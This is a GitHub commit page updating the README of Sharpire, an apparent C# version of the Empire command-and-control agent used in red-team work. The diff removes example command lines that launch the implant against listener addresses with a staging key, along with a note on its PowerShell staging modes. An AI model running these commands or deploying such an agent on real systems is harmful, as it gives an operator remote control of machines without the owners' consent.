Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Alexander authored Mar 14, 2019
1 parent 52718e9 commit 1292ed2
Showing 1 changed file with 9 additions and 6 deletions.
15 changes: 9 additions & 6 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,12 +1,15 @@
## Sharpire - An implimentation of the Empire Agent in C#
## Sharpire - An Implimentation of the Empire Agent in C#

sharpire.exe \<server\> \<stagingkey\> \<language\>
For usage details please see the wiki:<br>
https://github.com/0xbadjuju/Sharpire/wiki

*Note: This is still in testing.


sharpire.exe "http://192.168.255.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "powershell"<br/>
sharpire.exe "http://10.2.2.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "dotnet"
### Author, Contributors, and License

*Note: This is still in testing.
Author: Alexander Polce Leary (@0xbadjuju) - 2019

License: BSD 3-Clause

This application has two modes of operation, the first use the executable to stage down the PowerShell and executes it in a runspace. The second has the agent exist entirely in a C# application with PowerShell only being executed in modules.
Required Dependencies: None

0 comments on commit 1292ed2

Please sign in to comment.